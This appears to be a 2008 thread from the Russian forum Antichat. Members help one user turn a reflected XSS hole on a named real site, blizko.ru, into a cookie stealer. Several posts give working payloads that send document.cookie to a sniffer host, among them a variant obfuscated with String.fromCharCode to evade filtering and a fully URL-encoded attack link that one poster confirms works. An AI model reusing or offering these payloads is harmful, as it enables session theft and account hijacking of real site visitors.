Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.08.2008, 20:44
|
|
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741
Репутация:
0
|
|
не шлются кукисы
Допустим есть пассив xss, юзаю снифф каника
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua
заменяю на
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Edocument.location.hr ef='http://xxx.ru/s.gif?'+document.cookie%3C/script%3E&url=http://vital.h.com.ua не перенапрявляет на снифф=>кукисы не шлются
обрабатывается тока
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Edocument.location.hr ef='http://xxx.ru/s.gif'%3C/script%3E&url=http://vital.h.com.ua
Пробовал с разными xss
Не пинать)))
Последний раз редактировалось popel; 04.08.2008 в 21:20..
|
|
|
04.08.2008, 21:08
|
|
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734
Репутация:
14
|
|
Вместо "xxx.ru/s.gif?" попробуй "http://xxx.ru/s.gif?"
|
|
|
|
04.08.2008, 21:19
|
|
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741
Репутация:
0
|
|
я так и делал, просто в теме неправильно указал, уже исправил
|
|
|
|
04.08.2008, 21:36
|
|
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734
Репутация:
14
|
|
Код:
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
Это робит? |
|
|
|
04.08.2008, 21:48
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
? и + фильтруются.
|
|
|
|
04.08.2008, 21:50
|
|
Участник форума
Регистрация: 10.09.2007
Сообщений: 131
Провел на форуме:
829460
Репутация:
170
|
|
"><script>img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47,47,120,1 20,120,46,114,117,47,115,46,103,105,102,63)+docume nt.cookie;</script>
или так
я имею ввиду http://xxx замени на String.fromCharCode(
можно на don12.vip.su
Последний раз редактировалось Don1=2; 04.08.2008 в 21:55..
|
|
|
|
04.08.2008, 22:09
|
|
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741
Репутация:
0
|
|
пробовал вышеизложенное, не робит
на примере показать бы
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Ealert('ggg')%3C/script%3E&url=http://vital.h.com.ua
заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
резальта нет( или неправильный код?)
|
|
|
|
04.08.2008, 22:16
|
|
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734
Репутация:
14
|
|
я пробовал своим так
Код:
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
работает. Снифф точно рабочий? |
|
|
|
04.08.2008, 23:23
|
|
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741
Репутация:
0
|
|
.nor, спс
Всё выполнилось, используя твой посл код))
тока после этого попробовал сам
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;%3C/script%3E - не робит)
Какой исходный код? без обработки браузером, а то хз %3D,%2F чего откуда)))))
|
|
|
|
04.08.2008, 23:33
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Код:
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
